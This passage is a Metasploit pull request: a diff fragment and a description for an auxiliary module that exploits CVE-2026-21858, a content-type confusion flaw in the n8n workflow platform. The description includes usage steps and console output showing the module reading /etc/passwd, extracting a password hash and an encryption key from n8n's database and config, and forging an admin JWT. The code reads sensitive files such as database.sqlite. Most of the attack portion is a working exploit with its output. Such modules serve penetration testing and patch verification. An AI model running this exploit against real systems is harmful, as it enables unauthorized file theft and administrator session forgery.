+      when 'EXTRACT_ADMIN_SESSION'
+        db_content = read_file('/home/node/.n8n/database.sqlite')
+        #puts db_content.class
+       # db = SQLite3::Database.new(db_content)
+       # result = db.execute(%<select id,password from user where email='#{datastore['SPOOFED_USERNAME']}'>)
+       # puts result
+    end
+
+#    form_uri = create_file_upload_workflow
+#    #content_type_confusion_upload(form_uri, '/etc/passwd')
+#    #content_type_confusion_upload(form_uri, '/home/node/.n8n/database.sqlite')
+#    content_type_confusion_upload(form_uri, '/home/node/.n8n/config')
+#    #/rest/executions?filter=%7B%22workflowId%22%3A%22wlUENWX77ZX64YgH%22%7D&limit=10
+#   
+#    run_id = get_execution_id
+#
+#    puts run_id
+#
+#    file_content = extract_content
+#
+#    puts file_content
+    
+    #db = SQLite3::Database.new(file_content)
+    
+    #select id,password from user where email='admin@gmail.com';
+
   end
 
 end

--- a/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
+++ b/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Auxiliary
         'password' => datastore['PASSWORD']
       }.to_json
     )
-
+    return false unless res
     return true if res&.code == 200
 
     json_data = res.get_json_document


### PR DESCRIPTION
This PR serves as placeholder for module for CVE-2026-21858. 

~~**Work in progress**~~

## Auxiliary Module
This module exploits CVE-2026-21858, a critical unauthenticated remote code execution vulnerability
in the n8n workflow automation platform versions 1.65.0 through 1.120.x. The vulnerability, dubbed
"Ni8mare", is a content-type confusion flaw in webhook request handling that allows attackers to
achieve arbitrary file read. According to the published write-up, this CVE can be used to attain
unauthenticated RCE; however, that requires additional steps. The unauthenticated file read is
bound by two conditions: a way to extract the loaded file (either via an exposed chatbot or another
means) and an exposed file upload form. Those conditions are
[rarely actual](https://horizon3.ai/attack-research/attack-blogs/the-ni8mare-test-n8n-rce-under-the-microscope-cve-2026-21858/) at
the same time. This module tries to use the CVE for different scenarios - privilege escalation,
where a low-privileged user is allowed to read an arbitrary file and eventually gain admin access
by forging a ticket.

To start vulnerable n8n container, run: `docker run -p5678:5678 n8nio/n8n:1.120.0`

## Verification Steps

1. Install the vulnerable n8n instance
1. Start msfconsole
1. Do: `use auxiliary/gather/ni8mare_cve_2026_21858`
1. Do: `set USERNAME [username]`
1. Do: `set PASSWORD [password]`
1. Do: `set ACTION [EXTRACT_SESSION/READ_FILE]`
1. Do: `set SPOOFED_USERNAME [username]` or `set TARGET_FILENAME [username]`
1. Do: `run`

## Options

### EMAIL

Email of user, which will create a malicious workflow to execute arbitrary file read.

### PASSWORD

Password of user, which will create a malicious workflow to execute arbitrary file read.

## SPOOFED_EMAIL

If EXTRACT_SESSION action is set, the SPOOFED_EMAIL defines a user for which a spoofed session will be created.

## TARGET_FILENAME

If READ_FILE action is set, this option represent a file, whose content will be extracted.

## Scenarios

### File read

```
msf auxiliary(gather/ni8mare_cve_2026_21858) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(gather/ni8mare_cve_2026_21858) > set RPORT 5678
RPORT => 5678
msf auxiliary(gather/ni8mare_cve_2026_21858) > set email admin@gmail.com
email => admin@gmail.com
msf auxiliary(gather/ni8mare_cve_2026_21858) > set password Supersecret9
password => Supersecret9
msf auxiliary(gather/ni8mare_cve_2026_21858) > set action READ_FILE
saction => READ_FILE
msf auxiliary(gather/ni8mare_cve_2026_21858) > set TARGET_FILENAME /etc/passwd
rTARGET_FILENAME => /etc/passwd
msf auxiliary(gather/ni8mare_cve_2026_21858) > run verbose=true
[*] Running module against 127.0.0.1
[*] Creating file upload workflow...
[*] Cleaning up workflow s8d1du2IUfRXpicE...
[+] Results saved to: /home/ms/.msf4/loot/20260204123428_default_127.0.0.1_etcpasswd_119553.txt
[*] Auxiliary module execution completed
msf auxiliary(gather/ni8mare_cve_2026_21858) > cat /home/ms/.msf4/loot/20260204123428_default_127.0.0.1_etcpasswd_119553.txt
[*] exec: cat /home/ms/.msf4/loot/20260204123428_default_127.0.0.1_etcpasswd_119553.txt

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh
```

### Session extraction
```
msf auxiliary(gather/ni8mare_cve_2026_21858)> set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(gather/ni8mare_cve_2026_21858)> set RPORT 5678
RPORT => 5678
msf auxiliary(gather/ni8mare_cve_2026_21858)> set email admin@gmail.com
email => admin@gmail.com
msf auxiliary(gather/ni8mare_cve_2026_21858)> set password Supersecret9
password => Supersecret9
msf auxiliary(gather/ni8mare_cve_2026_21858)> set spoofed_email admin@gmail.com
spoofed_email => admin@gmail.com
msf auxiliary(gather/ni8mare_cve_2026_21858) > run verbose=true
[*] Running module against 127.0.0.1
[*] Creating file upload workflow...
[*] Cleaning up workflow eEqTclj3rxAS1KCb...
[+] Database saved to: /home/ms/.msf4/loot/20260204123341_default_127.0.0.1_database.sqlite_959168.bin
[+] Extracted user ID: 9701b0fb-dcf0-4431-93f2-570dbe48b102
[+] Extracted password hash: $2a$10$J7g5lE6/8P5K/58PR2YC..c0g02QEU5MTsFWqhUqf4.3p7sBrM4oW
[*] Creating file upload workflow...
[*] Cleaning up workflow uBmS93fou1Xw2554...
[+] Config file saved to: /home/ms/.msf4/loot/20260204123345_default_127.0.0.1_n8n.config_124017.bin
[+] Extracted encryption key: vEg+NXiKzB+E0w7isnvcM7TauaTwM4QF
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
[+] JWT ticket as admin@gmail.com: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Ijk3MDFiMGZiLWRjZjAtNDQzMS05M2YyLTU3MGRiZTQ4YjEwMiIsImhhc2giOiJMdzhCVHJKcEhRIn0.sxIbgD9ShEGvHbax2nbHHYv3CBXGLeNlx1dGbCCPttw
[*] Auxiliary module execution completed
```

## JWT encoding

Additionally to the module, this PR adds encoding support for JWT. The current implementation supports HMAC SHA256, no other algorithms are not supported yet. 